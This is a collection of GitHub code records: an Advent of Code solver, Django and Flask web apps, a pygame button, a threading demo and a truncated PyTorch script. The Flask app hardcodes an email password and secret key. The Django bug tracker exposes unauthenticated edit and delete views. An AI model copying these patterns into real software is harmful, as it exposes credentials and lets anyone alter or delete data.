set it to the key(the guardID) at the top of our sorted dictionary.\nsG_sleepAmount = sorted_guardSleeps[0][1]\t#create a variable 'sG_sleepAmount' and set it to the value at the top of our sorted dictionary.\n\nprint('\\nThe guard who slept the most is guard ' + sleepyGuard + '.')\t#Tell everyone on the commandline who the sleepiest guard is,\nprint('They slept for ' + str(sG_sleepAmount) + ' hours:minutes.\\n')\t#and how long they slept for in total.\n\n\n#But we need to find out which minute this very sleepy guard is most often asleep in:\n\nsgRecords = []\t\t#make a new list called sgRecords (short for sleepguard Records)\n\n\nfor guardRecord in guardRecords:\t\t#Loop through all our guard records,\n if guardRecord[0] == sleepyGuard:\t\t#until we find one for our sleepy guard\n sgRecords.append(guardRecord) \t\t#Add any matching records that we find to the sgRecords list.\n\nminuteFrequency = {}\t\t#Create a new dictionary 'minuteFrequency'.\nfor i in range (0,59):\t\t#loop through the range 0 to 59: these numbers represent the minutes of an hour.\n minuteFrequency[i] = 0\t#for each of this range, create a key and value pair in the dictionary, as {minute number: 0}.\n\nfor sgRecord in sgRecords:\t\t\t\t\t#loop through the sleep records of our sleepy guard;\t\n for i in range (sgRecord[1].minute, sgRecord[2].minute):\t#in each of the records, loop through the range of minutes from the 'f' minute to the 'w' minute.\n minuteFrequency[i] +=1\t\t\t\t\t#for each minute in this range, increment the value of that 'minute' key in the dictionary by 1. \t\t\t\t\n\nsorted_minuteFreq = sorted(minuteFrequency.items(), key=lambda element: element[1], reverse = True)\t#reverse-sort the dictionary by the values (not the keys),\n\t\t\t\t\t\t\t\t\t\t\t\t\t#and store the resulting dictionary with a new name.\n\nmostFreqMin = sorted_minuteFreq[0][0]\t\t#Store the key that is at the top of our sorted dictionary as the variable 'mostFreqMin' (because it is).\npuzzleAns = mostFreqMin * int(sleepyGuard)\t#Make a new variable 'puzzleAns', and calculate the answer to Part 1 of the 'Day 4' puzzle.\n\nprint('\\nThe minute the guard was most often asleep in was: ' + str(mostFreqMin) + '.')\t\t#Print the minute our guard was most often asleep to the console.\nprint('The answer to the puzzle is: ' + str(puzzleAns) + '.\\n')\t\t\t\t\t#Print the puzzle answer to the console.\n\n#--END--\n\n\n\n\n\n\n","repo_name":"hazelsavage/AoC-2018","sub_path":"4-1-commented.py","file_name":"4-1-commented.py","file_ext":"py","file_size_in_byte":7026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22550868158","text":"from django.shortcuts import render, redirect, get_object_or_404\n\nfrom .forms import UserCreateUpdateModelForm, ProfileUpdate\n\nfrom branches.models import Branch\nfrom django.forms import modelformset_factory\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.generic import ListView\nfrom .filter import UserFilter\n\nUSER = get_user_model()\nfrom utils.decorators import ad_required_fbv, profile_owner_only\n\n\nclass UserListView(ListView):\n model = USER\n template_name = \"accounts/list.html\"\n paginate_by = 20\n\n def get_context_data(self, **kwargs):\n context = super(UserListView, self).get_context_data(**kwargs)\n context['filter'] = UserFilter(self.request.GET)\n branch_slug = self.kwargs.get('branch_slug')\n if branch_slug.lower() == 'all':\n context['branch_title'] = 'ทั้งหมด'\n context['branch_slug'] = 'all'\n else:\n context['branch_title'] = Branch.objects.get(slug=branch_slug).title\n context['branch_slug'] = Branch.objects.get(slug=branch_slug).slug\n\n return context\n\n def get_queryset(self):\n branch_slug = self.kwargs.get('branch_slug')\n if branch_slug.lower() == 'all':\n qs = self.model.objects.all()\n else:\n qs = self.model.objects.filter(branch__slug=branch_slug)\n filtered_list = UserFilter(self.request.GET, queryset=qs)\n return filtered_list.qs\n\n\ndef user_detail_view(request, branch_slug, username):\n if branch_slug == 'all':\n obj = get_object_or_404(USER, username=username)\n else:\n obj = get_object_or_404(USER, branch__slug=branch_slug, username=username)\n template_name = 'accounts/detail.html'\n context = {\n \"object\": obj,\n 'branch_slug': branch_slug,\n\n }\n\n if obj.branch:\n context['branch_title'] = obj.branch.title\n else:\n context['branch_title'] = 'ทั้งหมด'\n\n return render(request, template_name, context)\n\n\n@ad_required_fbv\ndef user_update_admin_view(request, branch_slug, username):\n if branch_slug == 'all':\n obj = get_object_or_404(USER, username=username)\n else:\n obj = get_object_or_404(USER, branch__slug=branch_slug, username=username)\n form = UserCreateUpdateModelForm(request.POST or None, request.FILES or None, instance=obj)\n if form.is_valid():\n form.save()\n return redirect('branches:user_list', branch_slug=branch_slug)\n\n template_name = 'accounts/update.html'\n context = {\n \"object\": obj,\n 'form': form,\n 'branch_slug': branch_slug,\n }\n if obj.branch:\n context['branch_title'] = obj.branch.title\n else:\n context['branch_title'] = 'ทั้งหมด'\n\n return render(request, template_name, context)\n\n\n@ad_required_fbv\ndef user_delete_view(request, branch_slug, username):\n if request.method == \"POST\":\n obj = get_object_or_404(USER, username=username)\n obj.delete()\n return redirect('branches:user_list', branch_slug=branch_slug)\n\n\n@ad_required_fbv\ndef user_bulk_create_view_admin(request, branch_slug):\n branch = Branch.objects.get(slug=branch_slug)\n\n UserFormSet = modelformset_factory(model=USER, form=UserCreateUpdateModelForm)\n\n formset = UserFormSet(request.POST or None, request.FILES or None, queryset=USER.objects.none())\n\n if formset.is_valid():\n\n instances = formset.save(commit=False)\n\n for instance in instances:\n instance.branch = branch\n instance.save()\n\n return redirect('branches:user_list', branch_slug=branch_slug)\n\n\n\n context = {\n 'formset': formset,\n 'branch_slug': branch_slug,\n }\n\n if branch:\n context['branch_title'] = branch.title\n else:\n context['branch_title'] = 'ทั้งหมด'\n\n\n return render(request, 'accounts/create_bulk.html', context)\n\n\n@login_required\ndef user_profile_detail_view(request):\n obj = get_object_or_404(USER, username=request.user.username)\n template_name = 'accounts/profile/home.html'\n context = {\"object\": obj}\n return render(request, template_name, context)\n\n\n@login_required\ndef user_profile_update(request):\n form = ProfileUpdate(request.POST or None, request.FILES or None, instance=request.user)\n if form.is_valid():\n form.save()\n return redirect('profile:home')\n template_name = 'accounts/profile/update.html'\n context = {\n 'form': form,\n }\n return render(request, template_name, context)\n","repo_name":"purintibkaew/final","sub_path":"ims-master/v3/accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5300282672","text":"from django import forms\nfrom .models import Resource, Category, Donation, Announcement, Binnacle, Company\nfrom apps.app_users.models import User\nclass ResourceForm(forms.ModelForm):\n class Meta:\n model = Resource\n fields = ['name', 'id_resource']\n labels = {\n 'name':'Nombre de recurso',\n }\n\nclass CategoryForm(forms.ModelForm):\n class Meta:\n model = Category\n fields = ['name', 'id_category', 'photo']\n labels = {\n 'name':'Nombre de categoría',\n 'photo':'Foto de categoría'\n }\n \nclass AnnouncementForm(forms.ModelForm):\n class Meta:\n model = Announcement\n fields = ['id_announ', 'init_date', 'end_date', 'category']\n labels = {\n 'init_date':'Fecha de inicio',\n 'end_date':'Fecha de finalización',\n 'category':'Categoría',\n }\n widgets = {\n 'init_date': forms.DateInput(attrs={'type': 'date','class':'margin-top-10'}),\n 'end_date': forms.DateInput(attrs={'type': 'date','class':'margin-top-10'}),\n }\n \nclass DonationForm(forms.ModelForm):\n class Meta:\n model = Donation\n fields = ['resource_id','amount', 'description']\n labels = {\n 'resource_id':'Recurso',\n 'amount':'Cantidad',\n 'description':'Ingresa una descripción sobre la donación que realizarás.',\n }\n\nclass UserForm(forms.ModelForm):\n class Meta:\n model = User\n fields = ['user_cc', 'full_name', 'email', 'phone', 'birth_date', 'photo']\n widgets = {\n 'birth_date': forms.DateInput(attrs={'type': 'date','class':'margin-top-10'}),\n 'email':forms.EmailInput(attrs={'class':'margin-top-10'})\n }\n labels = {\n 'user_cc':'Número de identificación',\n 'full_name':'Nombre completo',\n 'email':'Correo electrónico',\n 'phone':'Número telefónico',\n 'birth_date':'Fecha de nacimiento',\n 'photo':'Foto de perfil',\n \n }\n \nclass BinnacleForm(forms.ModelForm):\n class Meta:\n model = Binnacle\n fields = ['date','description']\n widgets = {\n 'date': forms.DateInput(attrs={'type': 'date','class':'margin-top-10'}),\n }\n \nclass CompanyForm(forms.ModelForm):\n class Meta:\n model = Company\n fields = ['name', 'nit', 'address', 'phone', 'logo']\n widgets = {\n 'logo': forms.FileInput(attrs={'accept': 'image/*', 'max_size': 10485760}),\n }","repo_name":"ICESI-PI1/Knowledge-Project-Gr5","sub_path":"src/knowledge_project/apps/app_projects/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74761791788","text":"import pygame.font\n\n\nclass RetryButton:\n def __init__(self, screen):\n # Gets screen information\n self.screen = screen\n self.screen_rect = screen.get_rect()\n\n # Button parameters\n self.width, self.height = 200, 50\n self.button_color = (10, 10, 10)\n\n # Font parameters\n self.text_color = (255, 255, 255)\n self.font = pygame.font.SysFont(None, 48)\n\n # Sets the dimensions of the button, and the initial position of the button\n self.rect = pygame.Rect(0, 0, self.width, self.height)\n self.rect.center = self.screen_rect.center\n\n # Renders the text inside the button and sets the text on the middle of the button\n self.text = self.font.render(\"Retry?\", True, self.text_color, self.button_color)\n self.text_rect = self.text.get_rect()\n self.text_rect.center = self.rect.center\n\n # Builds the button\n def draw_button(self):\n self.screen.fill(self.button_color, self.rect)\n self.screen.blit(self.text, self.text_rect)\n","repo_name":"arkaanashadi/ArkaanAshadi_ITP2017_FinalProject","sub_path":"Final/Classes/RetryButton.py","file_name":"RetryButton.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38187208609","text":"import csv\r\nimport bcrypt as bcrypt\r\nfrom flask_login import LoginManager, UserMixin, login_user, login_required, logout_user\r\nfrom flask_wtf import FlaskForm\r\nfrom wtforms import StringField, TextAreaField, SubmitField, PasswordField, SelectField, RadioField\r\nfrom wtforms.fields.html5 import EmailField\r\nfrom wtforms.validators import InputRequired, Email\r\nfrom flask import Flask, session, redirect, render_template, url_for, flash\r\nfrom flask_mail import Mail, Message\r\n\r\napp = Flask(__name__)\r\n\r\n# login initialize\r\nlogin_manager = LoginManager()\r\nlogin_manager.init_app(app)\r\nlogin_manager.login_view = 'home'\r\n\r\n# email initialize\r\napp.config['SECRET_KEY'] = 'zahra nikbakht'\r\napp.config['MAIL_SERVER'] = 'smtp.googlemail.com'\r\napp.config['MAIL_PORT'] = 587\r\napp.config['MAIL_USE_TLS'] = True\r\napp.config['MAIL_USERNAME'] = 'soen287website@gmail.com' # enter your email here\r\napp.config['MAIL_DEFAULT_SENDER'] = 'soen287website@gmail.com' # enter your email here\r\napp.config['MAIL_PASSWORD'] = 'Soen287Website' # enter your password here\r\nmail = Mail(app)\r\n\r\n\r\n# function for a protected page where you can see the messages sent by users\r\n@app.route('/messages')\r\n@login_required\r\ndef messages():\r\n prefix = '/static/'\r\n with open('data/messages.csv') as f:\r\n top_list = list(csv.reader(f))[1:]\r\n return render_template('messages.html', top_list=top_list, prefix=prefix)\r\n\r\n\r\n# function for homepage, including the login form for admins\r\n@app.route('/', methods=['GET', 'POST'])\r\ndef home():\r\n form = LoginForm()\r\n prefix = '/static/'\r\n if form.validate_on_submit():\r\n user = find_user(form.username.data)\r\n # checking if the credentials are valid to login the admin\r\n if user and bcrypt.checkpw(form.password.data.encode(), user.password.encode()):\r\n flash('Logged in successfully.')\r\n login_user(user)\r\n session['next'] = '/'\r\n return redirect(\"/\")\r\n else:\r\n flash('Incorrect username and password.')\r\n with open('data/top3.csv') as f:\r\n top_list = list(csv.reader(f))[1:4]\r\n return render_template('home.html', top_list=top_list, prefix=prefix, form=form)\r\n\r\n\r\n@app.route('/about')\r\ndef about():\r\n return render_template('about.html')\r\n\r\n\r\n# function for a page for released games\r\n# including ratings for all games which are dynamically calculated based on user reviews\r\n@app.route('/released')\r\ndef released():\r\n bb = 0\r\n ww = 0\r\n tq = 0\r\n kp = 0\r\n count = 0\r\n with open('data/review.csv') as f:\r\n reviewlist = list(csv.reader(f))\r\n\r\n # calculating rating for Black Butterflies\r\n for row in reviewlist: # getting all the rows that include rating for this game\r\n temp = 0\r\n if row and row[0] == \"Black Butterflies\":\r\n count += 1\r\n for i in range(6):\r\n temp += int(row[i + 1]) # adding the scores\r\n bb += (temp / 6.0)\r\n if count != 0:\r\n bb = bb / count # calculating the average score\r\n bb = round(bb, 2)\r\n count = 0\r\n\r\n # calculating rating for Wonder's War\r\n for row in reviewlist:\r\n temp = 0\r\n if row and row[0] == \"Wonder's War\":\r\n count += 1\r\n for i in range(6):\r\n temp += int(row[i + 1])\r\n ww += (temp / 6.0)\r\n if count != 0:\r\n ww = ww / count\r\n ww = round(ww, 2)\r\n count = 0\r\n\r\n # calculating rating for Traitor's Quest\r\n for row in reviewlist:\r\n temp = 0\r\n if row and row[0] == \"Traitor's Quest\":\r\n count += 1\r\n for i in range(6):\r\n temp += int(row[i + 1])\r\n tq += (temp / 6.0)\r\n if count != 0:\r\n tq = tq / count\r\n tq = round(tq, 2)\r\n count = 0\r\n\r\n # calculating rating for Kitty Pop\r\n for row in reviewlist:\r\n temp = 0\r\n if row and row[0] == \"Kitty Pop\":\r\n count += 1\r\n for i in range(6):\r\n temp += int(row[i + 1])\r\n kp += (temp / 6.0)\r\n if count != 0:\r\n kp = kp / count\r\n kp = round(kp, 2)\r\n return render_template('releasedGames.html', bb=bb, ww=ww, tq=tq, kp=kp)\r\n\r\n\r\n@app.route('/wip')\r\ndef wip():\r\n return render_template('wip.html')\r\n\r\n\r\n# function for contact page\r\n# handling contact form\r\n# featuring an email system to send an automatic reply to the user, letting them know that the message is received\r\n@app.route('/contact', methods=['GET', 'POST'])\r\ndef handle_contact():\r\n form = ContactForm()\r\n if form.validate_on_submit():\r\n\r\n # defining the automatic reply message\r\n msg = Message(\"Message Received!\", sender=\"soen287website@gmail.com\", recipients=[str(form.email.data)])\r\n msg.body = \"Hello \" + form.name.data + \"! Your message has been received and we will get back to you soon.\"\r\n mail.send(msg)\r\n flash('Thank you! We have sent you a confirmation email.')\r\n # collecting the data of the form and writing it in a .csv file\r\n with open('data/messages.csv', 'a') as f:\r\n writer = csv.writer(f)\r\n writer.writerow([form.name.data, form.email.data, form.game.data, form.message.data])\r\n return redirect(url_for('handle_contact'))\r\n else:\r\n return render_template('contact.html', form=form)\r\n\r\n\r\n# function for a review survey (dynamic URL based on the game)\r\n# handles reviews from the user\r\n@app.route('/review/', methods=['GET', 'POST'])\r\ndef review(game):\r\n form = ReviewForm()\r\n if form.validate_on_submit():\r\n flash('Thank you for your participation!')\r\n # collecting the data of the form and writing it in a .csv file\r\n with open('data/review.csv', 'a') as f:\r\n writer = csv.writer(f)\r\n writer.writerow(\r\n [game, form.one.data, form.two.data, form.three.data, form.four.data, form.five.data, form.six.data])\r\n return redirect(url_for('home'))\r\n else:\r\n return render_template(\"review.html\", form=form, game=game)\r\n\r\n\r\n# user class (for admins only)\r\nclass User(UserMixin):\r\n def __init__(self, username, password=None):\r\n self.id = username\r\n self.password = password\r\n\r\n\r\n@login_manager.user_loader\r\ndef load_user(user_id):\r\n user = find_user(user_id)\r\n if user:\r\n user.password = None\r\n return user\r\n\r\n\r\ndef find_user(username):\r\n with open('data/users.csv') as f:\r\n for user in csv.reader(f):\r\n if username == user[0]:\r\n return User(*user)\r\n return None\r\n\r\n\r\n@app.route('/logout')\r\n@login_required\r\ndef logout():\r\n logout_user()\r\n flash('Logged out successfully')\r\n return redirect('/')\r\n\r\n\r\n# the contact form included in contact page\r\nclass ContactForm(FlaskForm):\r\n name = StringField(validators=[InputRequired()])\r\n email = EmailField(validators=[InputRequired(), Email()])\r\n message = TextAreaField(validators=[InputRequired()], render_kw={'rows': 7})\r\n game = SelectField(validators=[InputRequired()],\r\n choices=[('Black Butterflies', 'Black Butterflies'), (\"Wonder's War\", \"Wonder's War\"),\r\n (\"Traitor's Quest\", \"Traitor's Quest\"), (\"Kitty Pop\", \"Kitty Pop\"),\r\n (\"Salad Story\", \"Salad Story\"),\r\n (\"Dream of Desert\", \"Dream of Desert\"), (\"Unreality\", \"Unreality\")])\r\n submit = SubmitField('Submit')\r\n\r\n\r\n# the login form included in homepage\r\nclass LoginForm(FlaskForm):\r\n username = StringField('Username', validators=[InputRequired()])\r\n password = PasswordField('Password', validators=[InputRequired()])\r\n submit = SubmitField('Login')\r\n\r\n\r\n# review form\r\nclass ReviewForm(FlaskForm):\r\n one = RadioField('What do you think about the story?', validators=[InputRequired()],\r\n choices=[('5', 'Excellent'), ('4', 'Good'), ('3', 'Mediocre'), ('2', 'Bad'), ('1', 'Terrible')])\r\n two = RadioField('What do you think about the music?', validators=[InputRequired()],\r\n choices=[('5', 'Excellent'), ('4', 'Good'), ('3', 'Mediocre'), ('2', 'Bad'), ('1', 'Terrible')])\r\n three = RadioField('What do you think about the general gameplay?', validators=[InputRequired()],\r\n choices=[('5', 'Excellent'), ('4', 'Good'), ('3', 'Mediocre'), ('2', 'Bad'), ('1', 'Terrible')])\r\n four = RadioField('What do you think about the characters?', validators=[InputRequired()],\r\n choices=[('5', 'Excellent'), ('4', 'Good'), ('3', 'Mediocre'), ('2', 'Bad'), ('1', 'Terrible')])\r\n five = RadioField('If a friend asked you how the game was, what would you say?', validators=[InputRequired()],\r\n choices=[('5', 'Excellent'), ('4', 'Good'), ('3', 'Mediocre'), ('2', 'Bad'), ('1', 'Terrible')])\r\n six = RadioField('How was the game compared to other games that you have played in the same genre?',\r\n validators=[InputRequired()],\r\n choices=[('5', 'Excellent'), ('4', 'Good'), ('3', 'Mediocre'), ('2', 'Bad'), ('1', 'Terrible')])\r\n submit = SubmitField('submit')\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n","repo_name":"zahranikbakht/Website_Project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24251814183","text":"import re\n\nclass Comment:\n def __init__(self, sheet:str, cell:str, ex:str, dt:str, txt:str):\n self.sheet = sheet\n self.cell = cell\n self.exercise = ex\n self.datetime = dt\n self.comment = txt\n\n def print_comment(self):\n print(\n f\"\\tSheet: {self.sheet}\\n\",\n f\"\\tCell: {self.cell}\\n\",\n f\"\\tCell Data: {self.exercise}\\n\",\n f\"\\tTime-Stamp: {self.datetime}\\n\",\n f\"\\tComment: {self.comment}\"\n )\n\nclass RawCommentFile:\n USERS = \"|\".join((\"Lewis W\",\"Lewis Waite\"))\n MONTHS = \"|\".join((\"Jan\",\"Feb\",\"Mar\",\"Apr\",\"May\",\"Jun\",\"Jul\",\"Aug\",\"Sep\",\"Oct\",\"Nov\",\"Dec\"))\n # Eventually move into a sheets request\n SHEETS = \"|\".join((\"Jan\",\"Feb\",\"Mar\",\"Apr\",\"May\",\"Jun\",\"Jul\",\"Aug\",\"Sep\",\"Oct\",\"Nov\",\"Dec\",\"Exercises\"))\n RAW_REGEX = (\n fr'(({USERS})\\n({SHEETS})\\n,\\n([A-Z]{{1,2}}'\n fr'[0-9]{{1,3}})\\n\\|\\n([A-Za-z0-9 .,:-;()-]*)'\n fr'\\n+({USERS}))?\\n({USERS})\\n([0-9]{{1,2}}'\n fr'\\:[0-9]{{1,2}} [AMPM]{{2}} ({MONTHS}) '\n fr'[0-9]{{1,2}})\\n*([A-Za-z0-9 !?,.:-;\\'()-]*)'\n )\n\n def __init__(self, raw_comments:str):\n self.comment = raw_comments\n # Comment store\n self.parsed_comments = self.parse_comment()\n \n def parse_comment(self):\n parsed_comments = []\n self.extracted_input = re.findall(\n self.RAW_REGEX, \n self.comment\n )\n self.cleaned_input = [\n (p[2], p[3], p[4], \n p[7].replace('\\u202f',''),\n p[9]) for p in self.extracted_input\n ]\n\n # Only the top comment has the meta data\n # Store the rolling meta-data variables\n r_sheet=None\n r_cell=None\n r_exercise=None\n for com in self.cleaned_input:\n try:\n # Set the current variables\n c_sheet=com[0]\n c_cell=com[1]\n c_exercise=com[2]\n # If the above values are empty in this comment\n if all([\n c_sheet=='',\n c_cell=='',\n c_exercise==''\n ]):\n # If rolling variables haven't been set yet\n if all([\n r_sheet==None,\n r_cell==None,\n r_exercise==None\n ]):\n # The comment file hasn't reached its first value\n continue\n\n # Then take the values from the latest found\n c_sheet=r_sheet\n c_cell=r_cell\n c_exercise=r_exercise \n else:\n # Reset the rolling variables\n r_sheet=c_sheet\n r_cell=c_cell\n r_exercise=c_exercise\n\n c_date = com[3]\n c_txt = com[4]\n\n comment = Comment(\n sheet=c_sheet, \n cell=c_cell, \n ex=c_exercise, \n dt=c_date, \n txt=c_txt\n )\n parsed_comments.append(comment)\n except KeyError:\n print(\"Issue with regex string\")\n \n return(parsed_comments)\n \nclass APIComment:\n \"\"\"\n Not currently viable through the Google API\n \"\"\"\n def __init__(self):\n return","repo_name":"lewisjacques/FitnessProgram","sub_path":"comment.py","file_name":"comment.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40129517726","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib.auth import authenticate, login, logout\nimport pygeoip\nfrom bugform.forms import BugForm, AdminForm, SimpleTable, SearchForm, EditForm\nfrom bugform.models import BugModel, AdminModel\nimport django_tables2 as tables \nfrom django_tables2 import RequestConfig\nfrom ipware.ip import get_ip\nfrom django.contrib.auth.decorators import login_required\n\ndef loginuser(request):\n\tif request.method == 'POST':\n\t\tusername = request.POST.get('username', False)\n\t\tpassword = request.POST.get('password', False)\n\t\tuser = authenticate(username=username, password=password)\n\t\tif user is not None:\n\t\t\tlogin(request, user)\n\t\t\treturn admin(request)\n\t\telse:\n\t\t\treturn HttpResponse('You are dead!')\n\tif request.user.is_authenticated() and request.method == 'GET':\n\t\treturn admin(request)\n\telse:\n\t\tform = AdminForm()\n\t\treturn render(request, 'adminform.html', {'form': form})\n\n@login_required\ndef admin(request):\n\tq = BugModel.objects.all()\n\ttable = SimpleTable(q)\n\tRequestConfig(request).configure(table)\n\treturn render(request, 'bugreports.html', {'table':table} )\n\ndef index(request):\n\tif request.method == 'POST':\n\t\tform = BugForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\ttemplate = 'postform.html'\n\t\t\treturn render(request, template)\n\n\telse:\n\t\tip = get_ip(request)\n\t\tgeocity = pygeoip.GeoIP('GeoLiteCity.dat')\n\t\tcity = geocity.record_by_addr(ip)\n\t\tvideo_quality = request.GET.get('quality', None)\n\t\tvideo_format = request.GET.get('format', None)\n\t\tstream_title = request.GET.get('path', None)\n\t\tdata = {'ip':ip, \n\t\t\t'city': city['city'],\n\t\t\t'country': city['country_name'],\n\t\t\t'timezone': city['time_zone'],\n\t\t\t'video_format': video_format,\n\t\t\t'video_quality': video_quality,\n\t\t\t'stream_title': stream_title\n\t\t}\n\t\t\n\t\tform = BugForm(initial=data)\n\t\t\n\treturn render(request, 'data.html', { 'form': form, })\n\t\ndef bug_search(request):\n\tif request.method == 'POST':\n\t\tdesc = request.POST.get('desc')\n\t\tq = BugModel.objects.filter(desc__icontains=desc)\n\t\ttable = SimpleTable(q)\n\t\tRequestConfig(request).configure(table)\n\t\treturn render(request, 'bugreports.html', {'table':table} )\n\telse:\n\t\tform = SearchForm()\n\t\treturn render(request, 'bug_search.html', {'form' : form} )\n\t#return HttpResponse('My mind palace')\n\ndef bug_edit(request, pk):\n\tif request.method == 'POST':\n\t\trecord = BugModel.objects.get(pk=pk)\n\t\tform = EditForm(request.POST, instance=record)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn HttpResponseRedirect('../../admin')\n\n\telse:\n\t\trecord = BugModel.objects.get(pk=pk)\n\t\tdata = {\n\t\t\t'date':record.date,\n\t\t\t'email': record.email,\n\t\t\t'desc': record.desc,\n\t\t\t'os': record.os,\n\t\t\t'browser': record.browser,\n\t\t\t'loadtime': record.loadtime,\n\t\t\t'ip': record.ip, \n\t\t\t'city': record.city,\n\t\t\t'country': record.country,\n\t\t\t'timezone': record.timezone,\n\t\t\t'netspeed': record.netspeed,\n\t\t\t'bugstatus': record.bugstatus,\n\t\t\t'bugpriority': record.bugpriority\n\t\t}\n\t\t\n\t\tform = EditForm(initial=data)\n\treturn render(request, 'editbugform.html', { 'form': form, })\n\t\ndef bug_delete(request, pk):\n\trecord = BugModel.objects.get(pk=pk)\n\trecord.delete()\n\treturn HttpResponseRedirect('../../admin')\n\t\t\ndef logout_user(request):\n\tlogout(request)\n\treturn index(request)\n","repo_name":"Niharika29/bugtracker","sub_path":"bugtracker/bugform/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71045735467","text":"# Write a Python program to check a list is empty or not\n\nlst = [34,45,6,5,4,56,7]\n\ndef lie(l):\n if l:\n print('List is not empty')\n else:\n print('List is empty')\n\nlie(lst)\nlie([])\n\n# using len function\ndef len_lie(l):\n print('List is empty' if len(l)==0 else 'List is not empty')\n \nlen_lie(lst)\nlen_lie([])","repo_name":"Tashish97/Data-Science","sub_path":"Python_Practice/Lists/q7.py","file_name":"q7.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39395723474","text":"'''\nTemplate tags for paypal offsite payments\n'''\nfrom paypal.standard.forms import PayPalPaymentsForm, PayPalEncryptedPaymentsForm\nfrom django import template\nfrom django.template.loader import render_to_string\n\nregister = template.Library()\n\nclass PayPalNode(template.Node):\n def __init__(self, integration, encrypted=False):\n self.integration = template.Variable(integration)\n self.encrypted = encrypted\n\n def render(self, context):\n int_obj = self.integration.resolve(context)\n if self.encrypted:\n form_class = PayPalEncryptedPaymentsForm\n else:\n form_class = PayPalPaymentsForm\n form_str = render_to_string(\"billing/paypal.html\", \n {\"form\": form_class(initial=int_obj.fields),\n \"integration\": int_obj}, context)\n return form_str\n\n\n@register.tag\ndef paypal(parser, token):\n try:\n tag, int_obj = token.split_contents()\n except ValueError:\n raise template.TemplateSyntaxError(\"%r was expecting a single argument\" %token.split_contents()[0])\n return PayPalNode(int_obj)\n\n\n@register.tag\ndef paypal_encrypted(parser, token):\n try:\n tag, int_obj = token.split_contents()\n except ValueError:\n raise template.TemplateSyntaxError(\"%r was expecting a single argument\" %token.split_contents()[0])\n return PayPalNode(int_obj, encrypted=True)\n","repo_name":"renjithraj2005/merchant","sub_path":"billing/templatetags/paypal_tags.py","file_name":"paypal_tags.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"37459493602","text":"# @Time : 2022/01/25 21:31\n# @Author : ╰☆H.侠ゞ\n# -*-coding=utf-8-*-\n# =============================================================\nimport os\nimport threading\nimport time\n\n\n\"\"\"\n线程轮循执行,即上一个线程还没结束,下一个线程就开始执行了\n\"\"\"\n\n#\n# def task():\n# time.sleep(5)\n\n\n# 主线程与子线程轮循被执行,计算时间的代码【end_time - start_time】不会等两个子线程执行完,也不会在两个等5秒思考时间sleep(5),\n# 在开始执行线程那一刻,计算时间的代码就开始被执行了,这就是轮循的意思,例如小丑耍苹果\n# def main(): # 主线程\n# start_time = time.time() # 当前时间(current time),即线程开始时间\n# thread1 = threading.Thread(target=task) # 子线程1\n# thread2 = threading.Thread(target=task) # 子线程2\n# thread1.start()\n# thread2.start()\n# end_time = time.time() # 当前时间(current time),即线程结束时间\n# print(end_time - start_time) #\n#\n#\n# if __name__ == '__main__':\n# main()\n\n\n# ==========================================================================================================\nprint(\"=====================================================================================================\")\n# ==========================================================================================================\n\n\"\"\"\n加join()的作用:前面线程执行结束,后面的线程才能被执行\n\"\"\"\n\n\ndef task(name):\n print('Run child process %s (%s)...' % (name, os.getpid())) # os.getpid()获取进程id\n time.sleep(5)\n\n\ndef main(): # 主线程\n start_time = time.time() # 当前时间(current time),即线程开始时间\n thread1 = threading.Thread(target=task, args=('test1',)) # 子线程1\n thread2 = threading.Thread(target=task, args=('test2',)) # 子线程2\n # 两个子线程执行结束前,禁止执行其他线程\n thread1.start()\n thread2.start()\n thread1.join() # 可以等待子进程1结束后再继续往下运行\n thread2.join() # 可以等待子进程2结束后再继续往下运行\n end_time = time.time() # 当前时间(current time),即线程结束时间\n print(end_time - start_time) #\n\n\nif __name__ == '__main__':\n main()","repo_name":"superlff888/projectScripts","sub_path":"Lesson_22/python编程语言与框架/录播/python编程语言/多进程与多线程/multi_thread/multiThread.py","file_name":"multiThread.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3508067483","text":"\"\"\"\nsource:\nhttps://stackoverflow.com/questions/65498782/how-to-dump-confusion-matrix-using-tensorboard-logger-in-pytorch-lightning\nhttps://pytorch-lightning.readthedocs.io/en/latest/starter/introduction_guide.html\n\"\"\"\n\nimport torch\nfrom PIL import Image, ImageFile\nfrom torch.utils.data.sampler import Sampler\nfrom sklearn.metrics import confusion_matrix\nfrom torchvision import datasets, models, transforms\nimport torchvision\nimport os\nimport pytorch_lightning as pl\nfrom pytorch_lightning import Trainer\nimport albumentations as A\nfrom albumentations.pytorch import ToTensorV2\nfrom pathlib import Path\nimport torch.nn as nn\nimport cv2\nimport numpy as np\nimport json\nfrom pytorch_lightning.callbacks import ModelCheckpoint\n\nfrom kjn_face_id_system.optims.Adam import AdamW_GCC2\n\nImageFile.LOAD_TRUNCATED_IMAGES = 